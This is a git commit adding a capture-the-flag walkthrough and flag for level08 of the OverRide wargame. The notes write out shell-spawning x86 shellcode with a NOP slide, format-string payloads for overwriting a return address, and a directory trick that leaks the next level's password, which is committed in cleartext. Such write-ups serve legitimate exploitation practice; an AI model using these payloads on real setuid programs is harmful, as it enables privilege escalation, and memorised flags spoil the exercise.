feat: level08 + level09 elf

2025-07-01 15:26:11 +02:00 · 2025-07-01 15:26:11 +02:00 · 17686e16d3
parent 8b91fc4f30
commit 17686e16d3
3 changed files with 45 additions and 0 deletions
--- a/level08/flag
+++ b/level08/flag
@ -0,0 +1 @@
+fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
--- a/level08/walkthrough
+++ b/level08/walkthrough
@ -0,0 +1,44 @@
+load shellcode in env with nop slide
+
+level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin
+level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin)
+level08@OverRide:~$ 
+
+
+(gdb) p (char *)getenv("SHELLCODE")
+$1 = 0xffffffffffffe892 <Address 0xffffffffffffe892 out of bounds>
+
+need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest.
+
+Better version (file doesn't need to exist as log_wrapper is called before fopen)
+
+level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)")
+ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x
+level08@OverRide:~$ cat backups/.log
+LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858
+level08@OverRide:~$
+
+with env -i :
+Breakpoint 1, 0x0000000000400a5a in main ()
+(gdb) p (char *)getenv("SHELLCODE")
+$1 = 0xffffffffffffef79 <Address 0xffffffffffffef79 out of bounds>
+
+
+
+env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')")
+
+
+actually its way simpler T_T : 
+
+level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/
+level08@OverRide:~$ cd /tmp
+level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass
+ERROR: Failed to open /home/users/level09/pass
+level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass
+level08@OverRide:/tmp$ cat backups/
+home/ .log
+level08@OverRide:/tmp$ cat backups/home/users/level09/.pass
+fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
+level08@OverRide:/tmp$ exit
+logout
+Connection to localhost closed.
--- a/level09/Ressources/level09
+++ b/level09/Ressources/level09